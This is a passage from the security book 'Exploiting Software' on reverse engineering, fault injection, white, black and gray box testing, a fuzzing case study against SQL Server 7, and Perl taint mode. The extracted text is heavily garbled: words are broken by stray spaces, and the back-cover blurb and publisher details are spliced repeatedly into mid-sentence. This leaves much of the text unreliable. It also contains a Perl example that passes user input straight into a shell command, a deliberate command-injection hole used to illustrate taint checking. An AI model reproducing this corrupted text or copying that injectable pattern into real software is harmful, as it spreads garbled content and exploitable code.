nel- mod e debu gger s is called Soft I ce and it is pub lished by Comp uw ar e ( ht t p: / / w w w . com pu w are. com/ p r oduct s/ dr iver st udio/ d s/ sof t ice. ht m ) . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k

Fault Injection Tools

At t ack pat t er ns Tools t hat can su pply m alfor m ed or imp rop er ly f orm at t ed inpu t t o a t arg et soft w ar e pr ocess se engineer in gclass of f ault inject ion t ool. Pr ogr am failur es can be analy zed t o t o cauRev se er failur es are one det er min e w het her err or s exist in t h e t ar get sof t w are. Som e f ailu res h ave secur it y Classic ainst soft wan ar eat t ack er dir ect access t o t he host com p ut er or im plicat ion s, at sut acks ch asag f ailur esserv t haterallow net w or k. Fau lt inj ect ion t ools f all int o t w o cat egor ies: h ost and net w or k . Host - based f ault ising t acks ag ainst softat war e t o a pr ocess an d alt er p r ogr am st at es. inj ect Sur or s pr oper at eatlik e debug gersclien and t can t ach Net w ork - based fault inj ect or s m anipu lat e net w ork t r affic t o det er min e t he ef fect on t he Tech niqu es f or cr aft ing m aliciou s inpu t r eceiver . The t echn ical det ails of b uf fer ov er f low s Alt hou gh classic appr oaches t o fault inj ect ion oft en m ake u se of sou rce code in st r u ment at ion [ VoasRoot andkMcGr it s aw , 1 999 ] , som e m oder n f ault in ject or s pay m or e at t ent ion t o t w eak ing pr ogr am in put . Of par t icular int er est t o secu r it y pr act it ion er s ar e Hailst orm ( Cenzic) , t he Failu rei t Sim FSTwit ( Cigit an d con Holod eck Florkn id aow Tech) es Whyitttoaker 's Ex p lo in g uSlat o ftion w aTool re is or f illed h t hal) e t,ools, cept s, (and ledg .e Jam necessar b reak app roach t o fault inject ion for t est ing ( and br eak in g) sof t w ar e is ex plained in t w o book s soft w ar e. [ Whit t aker , 20 02; Whit t aker and Th omp son , 20 03] .

The Disassembler A d isassem b ler is a t ool t h at conv ert s m ach in e- readab le cod e int o assem bly langu age. Assem bly lang uage is a hu man - r ead able for m of m achine cod e ( w ell, m or e hu m an r eadable t han a st ring of b it s any w ay) . Disassemb ler s r eveal w hich m ach ine inst r uct ions ar e b eing

used in t h e cod e. Machine code is usually sp ecif ic t o a given har dw ar e ar chit ect u r e ( su ch as t he Power PC ch ip or I n t el Pen t ium chip ) . Thu s, disassemb ler s ar e w r it t en ex pr essly for t he t ar get h ar dw ar e archit ect ur e.

The Reverse Compiler or Decompiler •A d ecom pilerTable Content is a oft ool t hats conv er t s assem b ly cod e or m achine code in t o sour ce code in a • ndex age such as C. Decom pilers also ex ist t o t r ansfor m int er m ed iat e langu ages high er lev el Ilangu Expl ingJav Softw a ret eHow to an Br edakMicr Code suchoitas a by code osoft Com m on Run t im e Langu age ( CRL) int o sou rce code such Jav a. , Gar These t ools By Gr egas Hoglund y McGr aw ar e ex t r emely helpf ul in det er min in g higher level log ic su ch as loops, sw it ch es, an d if - t hen st at ement s. D ecom pilers are m u ch like disassemb ler s b ut t ake t he Pub pr ocess one ( im p ort an t ) st ep fu rt h er . A good disassem bler/ com piler pair can be u sed t o lish er: Addison Wesley com pile it s ow n collect iv e out put back int o t he sam e bin ary . Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Approaches to Reverse Engineering As w e said ear lier , som et imes sour ce code is av ailable for a r ev er se eng ineer and som et im es it is n ot . Wh it e box an d b lack b ox t est in g an d analysis m et hods bot h at t em pt t o un der st an d t he sof t w ar e, but t hey use d if fer en t ap pr oaches dependin g on w het her t h e analy st has access •t o sou rce code. Table of Content s •

I ndex

Expl oit ing Softw Br e, ak Code Regar dless of at re heHow m etto hod t her e ar e sev eral key ar eas t hat an at t acker shou ld ex amin e t o finGr d eg v uln er abilit ies in sof By Hoglund , Gar y McGr awt w are:

PubFunct lish er:ions Addison Wesley t hat do im pr oper

( or no) bound s check ing

Pub Dat e: February 17, 200 4

Funct t hat pass t hr oug h or con su m e user - sup plied dat a in a f orm at st rin g I SBN:ions 0- 20 1786 95 -8 Pages: 51 2

Funct ions meant t o en for ce boun ds checking in a f or mat st r in g ( su ch as %20s) Rou t ines t hat get u ser in put using a loop Low - lev el by t e copy oper at ions How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Rou tint ines t hat det useect point arit h met ic on susoft pplied fir ew alls, ru sion ion er sy st em s, and antuseriv ir us warbeuf n fers ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. " Tr ust ed" sy st em calls t h at t ake d yn amic in put Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d This somes ewh at t act l w hen ar eI f "yinout he w eeds" w itect h binar code. t echniqu used by ical badlist guyiss ut osefu br eak sof tyou w ar e. w ant t o p rot y our ysof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ustBox - h aveAnalysis book m ay shock y ou—and White

it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Whit e box analy sis in volv es analy zing and und er st and ing sou rce code. Som et im es on ly binar yWhy code buw t ill if ycon ou tdecom y to sour ce code an d t hen st ud y t he sofist wavailable, ar e ex ploit inue t opile be a a binar ser ious p rget oblem code, t his can be con sider ed a kin d of w h it e box an aly sis as w ell. Whit e box t est ing is t y pically vernet y efwfect in fitinding rog ram m When or kive secur y m echp anisms doing n oterr wor orsk and im plement at ion er r ors in soft w ar e. I n som e cases t his act ivit y amou nt s t o pat t er n mat ch in g and can ev en be aut om at ed w it h a t ack zer. pat[t4] er ns st at icAt analy One d raw back t o t his k ind of w hit ebox t est ing is t hat it m ay r epor t a pot ent ial vu lnerab ilit y w h er e n one act ually exist s ( called a false posit iv e) . Nev er t h eless, u sin g er se g sour ce cod e is a g ood ap pr oach t o exp loit in g som e k inds of st at icRev analy sisengineer met h odsinon soft w ar e. Classic at t acks ag ainst serv er soft w ar e [ 4]

Cigital's tool Sour ceScope, for exam ple, can be used t o find potent ial security flaw s in a piece of softwpr Sur arising e giv en atits t acks sourag ce ainst code (http: clien/ /twsoft w w .cigit war al.com e ).

Ther eTech ar e niqu t w o es t y pes of aft w hit box analy sis t ools, t hose t hat r eq uir e sour ce cod e and t hose t h at f or cr inge m aliciou s inpu t aut om at ically decom p ile t he bin ary code and con t inue fr om t h er e. One pow erf ul an d Thecially t echnavical det ails ofebbox uf feranalysis ov er f low s for m , called I D A- Pr o, does not r eq uir e sou r ce com mer ailable w hit p lat code access. Sour ceScope, w h ich includes an ext en siv e dat ab ase of sou rce code- r elat ed Root it s issu es com m only encoun t er ed in Jav a, C, and C+ + , d oes r equ ir e sour ce code. pr oblem s kand The k now ledg e en cap su lat ed in t hese t ools is ext rem ely u sef ul in secur it y an aly sis ( and , of Ex p lo i t in S oloit ft winagresof is tfw illed cour se, in gexp ar e)wit . h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Black Box Analysis Black box analy sis r ef er s t o analy zing a r un ning pr ogr am b y pr obing it w it h v ar ious inp ut s. This k ind of t est in g requ ir es only a r unn in g pr ogr am and does n ot m ak e use of sour ce cod e analy sis of any k ind. I n t he secur it y par adig m, malicious inp ut can be su pplied t o t he pr ogr am in an eff ort t o cau se it t o b r eak . I f t he p r ogr am does br eak du rin g a par t icular t est ,

t hen a secur it y pr oblem m ay hav e been discov er ed. Not e t h at b lack b ox t est in g is p ossible ev en w it hou t access t o binar y code. Th at is, a pr ogr am can be t est ed r emot ely ov er a n et w or k . All t h at is r equir ed is a pr ogr am r un ning somew her e t hat is accep t in g in put . I f t he t est er can sup ply inpu t t h at t h e pr ogr am consum es ( an d can observ e t h e eff ect of t he t est ) , t h en black box t est ing is p ossible. This is on e r eason t hat r eal at t ack er s of t en r esort t o b lack box t echniqu es. •

Table of Content s Black box t est ing is not as eff ect iv e as w hit e b ox t est in g in obt ain in g kn owledg e of t he code •and it s b eh avior I ndex, bu t b lack b ox t est in g is mu ch easier t o accom p lish and usually r eq uir es Expl oit ing Softw a re How to Br e ak Code m uch less exp er t ise t han w hit e box t est ing. D ur ing black box t est ing, an an alyst at t emp t s t o By Gr egatHoglund McGr aw ful int ern al code p at hs as can be d irect ly influ en ced and observ ed evalu e as m, Gar anyy m eaning fr om out side t he sy st em. Black b ox t est in g cann ot ex haust iv ely sear ch a real p rog ram ' s inpu t space forer:prAddison oblems becau se of t heoret ical con st r aint s, b ut a black box t est does act m or e like Pub lish Wesley an act ual at t ack on t ar get sof t w ar e in a r eal operat ion al env iron ment t han a w hit e box t est Pub Dat e: February 17, 200 4 usually can. I SBN: 0- 20 1- 786 95 -8

51 2 Becau Pages: se black

box t est ing happ en s on a live sy st em, it is of t en an eff ect iv e w ay of un derst an ding and evaluat in g denial- of- serv ice pr oblems. An d becau se b lack box t est in g can v alid at e an applicat ion w it hin it s r unt im e env ir onm ent ( if p ossible) , it can be used t o det er min e w het her a p ot ent ial pr ob lem ar ea is act ually v ulner able in a r eal pr odu ct ion syst em .[ 5] Som et im es pr oblem s t hat are d iscov er ed in a w hit e box analysis m ay not be 6] exp ab lesof int a r eal,brdeak ep loyed . A f irew ay tblock heeak at t on ack,p ur forpose? ex amp le. [are Howloit d oes w are ? Howsyst do em at t acker s mall akem sof w ar e tbr Why fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? [ 5] The problem w ith t esting live pr oduct ion systems should be obv ious. A successful denial- of- ser v ice t est What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

w ill t ake dow n a pr oduction sy st em j ust as effectiv ely as a real att ack. Com panies ar e not ver y r eceptive to this sor t of t esting, in our exper ience.

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d [ 6] How t echniqu es ev used by bad guy t o br eak sof w ar e.forI f test y ouingwhow ant at opiece p rotof ect y our ar e efracr omoss er , note that w hites box analysis is tuseful softw ar e sof w illt w behav iplem envir thiscarr kindied of testing at t ackm, ult y ou u st onments. fir st learFor n hcode ow rt hat eal isatwidely t acks deployed, are really ou t . is essential.

Cenzic's m is amcom m ercially available b lack ox t est in g plat for m netbey w orond k edt he This m ustHailst - h aveorbook ay shock y ou—and it will cer tbainly educat e y ou. Getf or t ing soft w ar e. I t can be u sed t o p rob e live sy st em s f or secu rit y p r oblem s. For t est ing net w ork scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t r out er s and sw it ch es, special har dw ar e dev ices ar e av ailab le, su ch as Sm ar t Bit s and I XI A. A fr eewar e t ool called I SI CS can b e used t o pr obe TCP/ I P st ack int egr it y . Pr ot ocol at t ack Why sof tuse w arblack e ex ploit ill con t inueinclud t o beeaPROTOS ser ious pand r oblem syst em s t hat b ox wt ech niques Spik e. When net w or k secur it y m ech anisms do n ot w or k

GrayAtBox Analysis t ack pat t er ns se engineer in g Gr ay Rev box eranalysis com bines w hit e b ox t ech niqu es w it h black box in put t est in g. Gray box app roaches u su ally requ ir e u sin g sever al t ools t og et her. A good ex amp le of a simp le gr ay box t acks er soft ar e a debu gger an d t h en sup plyin g p art icular set s of analy Classic sis is ruat nnin g a ag t arainst get pserv rog ram w itwhin inpu t s t o t he p rog ram . I n t h is way , t he pr ogr am is ex ercised w hile t h e debug ger is used t o pr ising clien war e s Pur ify is a comm er cial t ool t hat can pr ovid e det ectSur any failur at est acks or fauag lt yainst behav ior.t soft Rat ional' det ailed r un t ime analysis f ocu sed on m em or y use and consum pt ion . This is p art icular ly Tech niqu es f or cr aft ing m aliciou s inpu t im por t ant for C an d C+ + pr ogr am s ( in w hich m em ory pr oblem s ar e r am pan t ) . A f r eew ar e debu gger h at pical rov det idesails r unt e fer an alysis for sLinu x is called Valg rin d. The ttechn ofim b uf ov er f low All t est ingkm Root it set h ods can rev eal possib le sof t w ar e r isk s and pot en t ial exp loit s. Wh it e box analy sis dir ect ly ident if ies m or e bu gs, bu t t h e act ual r isk of ex ploit is har d t o m easu r e. Black box ani talysis pr ob ar econ k now n s,t oand b e ex ab le. Th e use yoft ogrbay b ox Ex p lo in g Sident o ft w ifa ies re isr eal f illed witlem h t hs et ht at ools, cept knploit ow ledg e necessar reak tsoft echniqu es com bin es b ot h met h ods in a p ower fu l w ay . Black b ox t est s can scan pr ogr am s w ar e. across n et wor k s. Whit e b ox t est s requ ire sou rce code or binar ies t o an aly ze st at ically . I n a t y pical case, w h it e box an aly sis is used t o fin d p ot ent ial pr ob lem ar eas, and black box t est ing is t hen used t o dev elop w or kin g at t ack s ag ain st t hese ar eas.

Bla ck Bo x

W h it e Bo x

Aud it soft w ar e r un t ime env iron ment

Aud it soft w ar e code Pr ogr am min g er r ors

Ex t er nal t h reat s • •

Table of Content s

Cent r al cod e reposit or y r eq uir ed

Denial of ser vice I ndex

Valuable t o dev elop er s an d t est ers

Expl oit ing Softw a re How to Br e ak Code

Cascade f ailu re

By Gr eg Hoglund , Gar y McGr aw

Secu rit y policy an d filter: er sAddison Wesley Pub lish Pub Dat e: February 17, 200 4

Scales an d ru ns I SBN: 0- 20 1- er 786 -8 across ent pr95ise Pages: 51 2 net w or k Valuable t o secur it y / syst em s adm inist r at or s

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What can u sedost t o all b reak soft e? itTh book ides t heofansw On e prt ools oblem w itbe h alm kin ds of war secur y is t est ing (prrov eg ar dless w heterhs. er su ch t est ing is black box or w hit e box ) is t hat t her e r eally isn't any . Th at is, m ost QA or ganizat ions con cer n Ex p loselv i t ines g S a re ional is loaded wgit hanex at ttack t ack pat t ergns, ools, an for d t hem woitft h wf unct t est in d amp sp enles d vof eryr eal lit t le imes,u at nder st andin or tpr obing tsecur echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om it y r isks. Th e QA p r ocess is alm ost alw ays b r oken in m ost com m er cial soft w ar e h ouses at t ack , ybecause ou m u st of fir st n h ow r eal con at t acks are really ied ou t . QA is n ot an essent ial par t any w ay t imlear e and bu dget st r aint s and t hecarr b elief t hat of soft w ar e dev elop ment . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt eat mes enmor t f ound anyt , hack s, you w illg learn abou As softkwidardie e bt recom e imin pormt an m or eing embook ph asis is bein placed on tsof t w ar e qualit y m anagem ent —a unif ied app roach t o t est ing and analy sis t hat en comp asses secur it y , r eliabilit y , and per for m ance. Soft war e q ualit y m anagem ent u ses b ot h wh it e box an d black Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem box t echn iq ues t o id en t ify an d m an age soft w ar e r isks as ear ly as p ossible in t he sof t w are dev elop ment life cykcle. When net w or secur it y m ech anisms do n ot w or k At t ack pat t er ns

Using Gray Box Techniques to Find Vulnerabilities in Microsoft SQL Rev er se engineer in g Server 7 Classic at t acks ag ainst serv er soft w ar e Gr ay box t echn iques usu ally lev er age sev er al t ools. We pr ovide an ex am ple using r unt im e Sur pr ising t acks ag ainst clien t soft war debu gging t ools at com bined w it h a black box ineput gener at or . Using r unt im e er ror det ect ion and debu ggin g t ools is a pow er ful w ay of find ing pr oblem soft w ar e. When com b in ed w it h esion f ort ools, cr aft ing aliciou inpu t ch soft war e f ault s. I n man y cases, disassem bly black Tech box niqu in ject d ebm ugg er s hselp cat of t he pr ogr am can det er m ine t h e ex act n at ur e of a sof t w ar e bug lik e t he on e w e w ill sh ow The t echn ical det ails of b uf fer ov er f low s y ou. Root k it s On e ver y pow er ful t ool t h at ex amin es sof t w are dy nam ically as it ru ns is Rat ional's Pu r if y . I n tEx hisp lo exi am ple, black ioncon ag ainst t ' s ledg SQLeSer v er 7 usin t in g S ow ftewper a refor is m f illed witbox h t h in e ject t ools, cept s,Micr andosof kn ow necessar y t ogb reak Hailst or m , w hile m onit or ing t h e t ar get inst r um ent ed und er Pur if y . By com bining Pur ify and soft w ar e. Hailst or m , t h e t est is able t o un cov er a m em ory cor r upt ion p rob lem occur r ing in t h e SQL ser v er as a r esult of m alfor m ed p r ot ocol inpu t . The cor r upt ion r esu lt s in a soft w ar e except ion and subsequ en t f ailu re. To st ar t , a r em ot e in put point is ident if ied in t he SQL serv er. The serv er list en s for connect ions on TCP por t 1 433 . The pr ot ocol used ov er t his p ort is un docum ent ed f or t h e m ost par t . I n st ead of r ev erse eng in eer ing t he p r ot ocol, a simp le t est is const ru ct ed t h at supp lies r andom input s int er sp er sed w it h num er ical sequ en ces. These dat a ar e play ed again st t he TCP por t . Th e r esult is t he generat ion of m any p ossible " q uasilegal" inpu t s t o t he por t , wh ich t h us

cover s a wid e ran ge of inp ut values. The in put s ar e inject ed f or sev er al m inut es at a r at e of ar ound 2 0 p er second. The d at a in ject ed pass t h rou gh a n um ber of dif fer en t code p at hs in side t he SQL serv er soft w ar e. These locat ion s, in essence, r ead t h e pr ot ocol header . Af t er a shor t t ime, t h e t est causes a f ault , and Pu rif y not es t h at m emor y cor r upt ion has occur r ed. The scr een shot in Figur e 3- 2 illust r at es t he SQL ser ver f ailu r e, t he Pur if y dum p, and t he • Table of Content s Hailst or m t est ing plat f or m all in one place. The m em or y cor r up t ion n ot ed b y Pur ify occur s •befor e t he SQL I ndex ser v er crashes. Alt hou gh t he at t ack d oes result in a ser ver cr ash, t h e point of Expl oitor ing Softw reion Howw to Br e be ak Code m em y cor ruapt ould har d t o det er m ine w it hou t t he use of Pur if y. The dat a supp lied By byGrPu egr Hoglund if y allow , Gar usy tMcGr o locat aw e t he ex act code pat h t hat failed. Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

Figu rI SBN: e 3 -0-220. 1-Scr e e n sh ot s of Ha il st or m a nd Pur i fy b ei ng used t o pr obe 786 95 -8 t hPages: e SQL se r v er sof t w ar e f or se cur i t y pr obl em s u sin g a bl ack box 51 2 pa r ad igm . [ View full size im age]

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The dThe et ectt echn ion ofical t his f ailu s wov ell det ailsreofoccur b uf fer er bef f lowore s an act ual ex ploit has occur red. I f w e wan t ed t o fin d t his exp loit using only b lack b ox t ools, w e m ig ht sp en d d ays t r ying inp ut t est s b ef or e t his k it s . The cor r upt ion t hat is occu r ring m igh t cause a cr ash in an ent ir ely d iff er ent bu g isRoot ex ercised code locat ion, m ak ing it v ery h ar d t o ident if y w hich inp ut sequ en ce cau ses t h e err or . St at ic Ex p losis i t inmig g Sht o fthw a redet is ect f illed t h eory t ools, conion ceptpr s,oblem and kn owt ledg necessar b reak analy ave ed wit a mhem cor r upt , bu it weould neverybteo able to soft w min ar e.e w het her t he bug could be exp loit ed in pr act ice b y an at t acker . By com bining bot h det er t echnologies as w e d o in t his ex amp le, w e sav e t im e and get t he b est of bot h w orld s.

Methods of the Reverser Ther e ar e sev eral met h ods t h at can be used w hile rev erse engin eer ing sof t w ar e. Each h as benefit s and each has r esour ce and t ime requ irem en t s. A t y pical ap pr oach u ses a mix t ur e of m et hods w h en decom pilin g and ex am ining soft w ar e. The b est m et h od m ix d ep en ds ent ir ely •on you r goals. Table Content s y ou m ay fir st w ant t o ru n a qu ick scan of t he code f or obv ious Forof exam p le, •v ulner abilit ies. I ndex Next , you m ay w ant t o perf or m a d et ailed in put t r ace on t he u ser - su pplied Expl oit ing How to Br e ak Code dat a. YouSoftw maya re n ot h ave t ime t o t r ace each and ev er y pat h, so y ou m ay use com plex brGr eakp oint s an d ot h er aw t ools t o sp eed up t he p rocess. What follow s is a b rief descr ipt ion of By eg Hoglund , Gar y McGr sev er al basic m et hods. Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

Tracing I SBN: Input 0- 20 1- 786 95 -8 Pages: 51 2

I npu t t r acing is t he most t hor ough of all m et hod s. Fir st y ou ident ify t he inp ut p oint s in t he code. I npu t p oin t s ar e places w here user - sup plied dat a ar e being deliv er ed t o t he p rog ram . For exam ple, a call t o WSARecvFrom() w ill r et r iev e a net w ork p ack et . Th is call, in essence, accept s user - sup plied dat a f rom t he n et w or k and p laces it in a buf fer . You can set a br eakp oint on t he inp ut p oint and sin gle- st ep t r ace in t o t h e pr ogr am . Of cour se, y our How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are debu gging t ools shou ld alw ay s include a pencil an d p aper. You m u st not e each t w ist and t ur n fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? in t he code p at h. Th is appr oach is ver y t edious, b ut it is also v er y com pr ehensive. What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Alt hou gh det er m ining all inp ut point s t akes a gr eat deal of t im e if y ou do it by h and, y ou Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d hav e t h e oppor t u nit y t o not e ev er y single code locat ion t hat m akes d ecision s based on u ser t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om supp lied dat a. Using t his m et hod y ou can f in d v er y com p lex p rob lem s. at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . On e langu age t hat pr ot ect s against t his k ind of " look t hr oug h t he inp ut s" at t ack is Per l. Per l This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he has a special secur it y m ode called t aint m od e. Taint m ode u ses a com b in at ion of st at ic an d scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t dy nam ic checks t o m onit or all in for m at ion t hat com es fr om ou t sid e a p r ogr am ( such as user inpu t , p rog ram arg um ent s, and env iron ment v ar iab les) an d issues w ar ning s w hen t he pr ogr Why am atsof t em o som et hing pot ent w it h t hat unt r ust ed infor m at ion. t wpt arset o exdploit w ill con t inue t o ially be adan ser gerou ious psr oblem Con sider t he follow ing scr ipt : When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e #!/usr/bin/perl -T Tech niqu es f or cr aft ing m aliciou s inpu t $username = ; The t echn ical det ails of b uf fer ov er f low s chop Root $username; k it s system Ex p lo i t in("cat g S o ft/usr/stats/$username"); w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

On execut ing t h is scr ipt , Per l ent er s t aint m ode because of t he –T op t ion passed in t he inv ocat ion line at t h e t op. Per l t h en t r ies t o com pile t he pr ogr am . Taint mod e w ill not ice t hat t he pr ogr am mer h as not ex plicit ly init ialized t he PATH v ar iable, y et t r ies t o inv ok e a p rog ram using t he sh ell an yw ay , w h ich can easily be exp loit ed . I t issues an er r or such as t he f ollow in g befor e ab ort in g com pilat ion:



Table of Content s

Insecure $ENV{PATH} while running with -T switch at • I ndex Expl oit ing Softw a re How to Br e ak Code

./catform.pl line 4, chunk 1. By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 0- 20 1786scr 95 -8 We canI SBN: m odify t he ipt t o set t he pr og ram ' s pat h exp licit ly t o som e saf e valu e at st ar t up : Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. #!/usr/bin/perl Ex p lo i t in g S o ft w a -T re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om use strict; at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . $ENV{PATH} = join ':' split (" ", shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t /usr/bin /binWhy sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k __EOPATH__ At t ack pat t=er ; ns my $username er se engineer in g chop Rev $username; Classic at t acks ag ainst serv er soft w ar e system ("cat /usr/stats/$username"); Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t Taint The m ode nowical detdet erm ines atfer t h eov$username v ar iable is ext er nally cont r olled an d is n ot t o t echn ails of tbhuf er f low s be t ru st ed . I t det er m in es t hat , b ecause $username m ay b e poisoned, t he call t o system m ay Rooted k it.s I t t h us g iv es an ot her er ror : be p oison Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Insecure dependency in system while running with

-T switch at ./catform.pl line 9, chunk 1.

Ev en if w e w er e t o copy $username in t o an ot her v ariab le, t ain t m ode w ou ld st ill cat ch t he pr oblem . •

Table of Content s

I n t he pr ev iou s exam ple, t ain t m ode com plains b ecause t h e v ariab le can use shell m agic t o • I ndex cause a com m and t o r u n. But t aint m ode does n ot ad dr ess ev er y p ossible inp ut vu ln er abilit y , Expl oit ing Softw a re How to Br e ak Code so a clev er at t ack er using our in put - dr iven m et h od can st ill w in. By Gr eg Hoglund , Gar y McGr aw

Adv anced d at aflow analysis is also u sefu l t o help p rot ect against ou r at t ack m et hod ( or t o helpPub car y itAddison ou t ) . Wesley St at ic analysis t ools can help an an aly st ( or an at t ack er ) ident if y all lishr er: possible inpu t p oin t s and t o det erm ine wh ich v ar iab les ar e af fect ed f r om t he ou t sid e. The Pub Dat e: February 17, 200 4 secur it y r esear ch lit er at ur e is f illed wit h r efer en ces discussin g " secur e inf orm at ion flow " t hat I SBN: 0- 20 1- 786 95 -8 t ak e adv ant ag e of dat a flow an alysis t o det er m ine p rog ram saf et y. Pages: 51 2

Exploiting Version Differences When y ou sof st utdy a sy em? tHow o f inddow at eak nesses, emem h e sof arpose? e v en dor es m any How d oes w are brsteak t acker s mrake sofber t w art he at br teak on tpwur Whyf ixare bu gs in each v er sion r elease. I n som e cases t he v endor may su pply a " hot fix " or a pat t hat fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad gch uy s? up dat es t he sy st em binar ies. I t is ext r em ely im por t ant t o w at ch t h e diff erences bet w een What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. soft w ar e v er sions. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d The d iff eres ences een guy ver ssion e, in t ack m aps. f a ect newy our v er sion t echniqu usedbet by wbad t o sbrar eak sofessence, t w ar e. I f at y ou w ant t o pI rot sof t wofartehefr om soft w ar e or p rot ocol sp ecificat ion is available, t h en w eakn esses or bu gs w ill m ost cer t ain ly at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . hav e been fix ed ( if t hey h ave b een discover ed ) . Ev en if t h e " bu g f ix" list is not pu blish ed , y ou can par t h ebook binarmy ay f iles of t hyeou—and older v er ag ainst e new e. Dif ferences This com m ust - heave shock it sion will cer t ainlyt heducat y ou. Get t ingcan beybe ond t he un cov ered w her e feat ur es hav e been added or bu gs hav e b een fix ed . These dif fer en ces scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t t her eby r ev eal im por t ant hint s regar d in g wh er e t o look for vu ln er ab ilit ies. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

